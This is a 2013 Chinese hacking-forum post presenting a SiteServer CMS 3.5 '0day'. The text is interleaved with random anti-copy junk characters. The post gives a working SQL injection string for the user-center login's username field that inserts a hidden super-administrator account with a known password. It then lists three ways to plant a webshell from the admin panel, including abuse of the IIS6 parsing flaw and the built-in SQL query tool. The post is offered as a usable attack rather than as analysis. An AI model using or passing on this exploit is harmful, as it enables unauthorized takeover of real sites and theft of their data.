中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
  d4 U+ @: W$ d' Q  j9 l; l7 S8 ~" q+ O) ^. @9 {; h4 c9 t; [( j! }
stieserver官网:www.siteserver.cn
1 Y9 X9 c1 {0 J+ r2 I& P  ^  y
0 H1 a5 u* p2 o1 H6 J, A # @: {& r- g# a, X, R3 C& M$ ~

- K6 c& {2 {2 rEXP:2 K. ]- D5 O7 H
/ L, W/ a5 V( m; i/ {7 Z9 Z/ X7 [+ |
直接访问UserCenter/login.aspx; ^, q3 K8 F, j2 ]* B
( x' ]- ]( E! F  p0 U9 H! Q$ o9 s* \
9 a- z, J8 G0 u7 M; U) w

' x$ O; {+ a' g7 s, e% R用户名处输入:
$ }; c( O+ R6 k. T% [. O. x: k4 Y, F! {2 o: V+ p7 m* X( k* i7 U
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--; ?8 M% f) j0 h3 Q% B4 H# o5 F
5 n' h  `5 }- A: k+ Z

2 K5 w3 I9 E7 W8 v( F
; c( s: H0 U  q2 l3 s密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
9 ^* l: i% y, z9 z$ K
( n. K/ m( ?/ ?0 ?2 Y; e( Z, H5 s & M0 `2 |5 W# {( R6 n

& }0 K/ x& _- L之后再访问后台SiteServer/login.aspx用插入的用户登陆7 d6 u- u* {% k0 P

  |! ^' B& y8 F' G, Y
( ^. o% Y( g7 X- L# [3 P; {
. G& t4 `, `2 b1 F2 C8 ~后台拿webshell的三种方法:
5 L7 ?8 c& n# R  @7 W/ R" s; k8 k; ?7 V8 n4 b; A  Q8 h
一、6 J, Q& a# @; g0 X% f# u. S, \

+ d, W/ h- O# l0 j站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! x2 `" l2 j# }0 a; N
* q8 S" O9 A) z  o0 ~二、: t3 n& m! o/ [- i/ b% J

7 s, q7 Z6 m7 z* p8 ]$ ]( `成员权限-》添加用户-》用户名为:1.asp
: u8 [1 R5 f- a# \. A9 g
( s# d( H1 R. R$ Uhttp://127.0.0.1/usercenter/
7 m7 `- d, M7 W1 ~" j6 \3 h
! r: B  L, y# w+ x, z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
# p' c" b& r9 ?, s- k
1 ~$ g$ C3 p8 u, Q' i% M& a' U! z3 ~! Y(ps:后台添加用户时不会验证是否含有非法字符)& e3 S* p. ^* d$ d# R" D4 U( f' }

- W! Y1 o4 b( s- ]3 P三、
! E3 h8 a; C$ T9 Y5 r- w) L# q# Q) Z: B
系统工具-》实用工具-》机器参数查看
0 ~7 D* E1 `# }- K可以看到数据库类型、名称,WEB路径
4 ~4 O) u3 q: p' K( E9 P3 g7 J7 Q
; b: k" C2 i  A8 A( g! l系统工具-》数据库工具-》SQL语句查询8 p' w5 }7 B1 v
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
2 D" e; j) @  e% H
( q7 C9 ~  f& T, \




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2